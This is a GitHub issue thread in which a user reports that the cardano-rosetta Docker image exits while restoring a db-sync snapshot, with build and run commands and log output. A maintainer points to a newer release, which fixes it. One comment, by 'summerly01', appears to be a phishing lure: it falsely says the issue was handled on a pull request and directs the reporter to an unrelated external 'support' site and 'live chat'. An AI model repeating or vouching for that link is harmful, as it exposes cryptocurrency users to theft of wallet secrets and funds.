### ISSUE TITLE
The docker cannot running.

### ISSUE THREAD

**Issue by heyonggl** [cardano-foundation/cardano-rosetta#574]
### Ask a question

build command:

DOCKER_BUILDKIT=1 \
docker build \
  --build-arg BUILDKIT_INLINE_CACHE=1 \
  --build-arg SNAPSHOT_URL=https://update-cardano-mainnet.iohk.io/cardano-db-sync/13.4/db-sync-snapshot-schema-13.4-block-10683068-x86_64.tgz \
  --cache-from=cardanofoundation/cardano-rosetta:master \
  -t cardanofoundation/cardano-rosetta:2.3.2-apply-snapshot \
  https://github.com/cardano-foundation/cardano-rosetta.git#2.3.2

run command:

docker run \
  --name cardano-rosetta \
  -p 8081:8080 \
  -v /root/cardano-rosetta:/data \
  --shm-size=4g \
  cardanofoundation/cardano-rosetta:2.3.2-apply-snapshot

result:

Cardano Rosetta
Restoring cardano-db-sync snapshot
Extracting tarball
db/
db/4155.dat.gz
db/4267.dat.gz
db/4161.dat.gz
db/4182.dat.gz
db/4229.dat.gz
db/4220.dat.gz
db/4259.dat.gz
db/4218.dat.gz
db/4222.dat.gz
db/4165.dat.gz
db/4253.dat.gz
db/4235.dat.gz
db/4167.dat.gz
db/4255.dat.gz
db/4159.dat.gz
db/4180.dat.gz
db/4179.dat.gz
db/4192.dat.gz
db/4194.dat.gz
db/4169.dat.gz
db/4145.dat.gz
db/4261.dat.gz
db/4241.dat.gz
db/4200.dat.gz
db/4273.dat.gz
db/4279.dat.gz
db/4269.dat.gz
db/4139.dat.gz
db/4251.dat.gz
db/4135.dat.gz
db/4210.dat.gz
db/4173.dat.gz
db/4151.dat.gz
db/4141.dat.gz
db/4243.dat.gz
db/4202.dat.gz
db/4149.dat.gz
db/4157.dat.gz
db/4233.dat.gz
db/4224.dat.gz
db/4257.dat.gz
db/4216.dat.gz
db/4206.dat.gz
db/4208.dat.gz
db/4212.dat.gz
db/4188.dat.gz
db/4177.dat.gz
db/4228.dat.gz
db/4163.dat.gz
db/4198.dat.gz
db/4186.dat.gz
db/4237.dat.gz
db/4226.dat.gz
db/toc.dat
db/4147.dat.gz
db/4245.dat.gz
db/4214.dat.gz
db/4196.dat.gz
db/4184.dat.gz
db/4275.dat.gz
db/4137.dat.gz
db/4204.dat.gz
db/4231.dat.gz
db/4239.dat.gz
db/4153.dat.gz
db/4247.dat.gz
db/4263.dat.gz
db/4265.dat.gz
db/4271.dat.gz
db/4249.dat.gz
db/4190.dat.gz
db/4171.dat.gz
db/4277.dat.gz
db/4143.dat.gz
db/4175.dat.gz
db/4281.dat.gz
131659431-d8670bd18e.lstate.gz
mv: cannot stat '': No such file or directory

`# docker ps -a
CONTAINER ID   IMAGE                                                    COMMAND             CREATED         STATUS                      PORTS     NAMES
071f12d521b4   cardanofoundation/cardano-rosetta:2.3.2-apply-snapshot   "./entrypoint.sh"   7 minutes ago   Exited (1) 11 seconds ago             cardano-rosetta
`

**Comment by summerly01** [comment]
This issue has been previewed on Pull Request. To Resolve,
Contact the [Support page](https://livecustomers-support.web.app) to resolve your error. Note: you can also initiate a chat with the live agent on the chat button to get more information about your request via [Live Chat](https://livecustomers-support.web.app)
@heyonggl

**Comment by Kammerlo** [comment]
@heyonggl we updated db-sync and the node to fix this issues. Could you try the newest release and see if it fixes your issue?

**Comment by heyonggl** [comment]
It is solved by the newest release .Thanks

**Comment by heyonggl** [comment]
It is solved by the newest release .Thanks

**Comment by heyonggl** [comment]
close
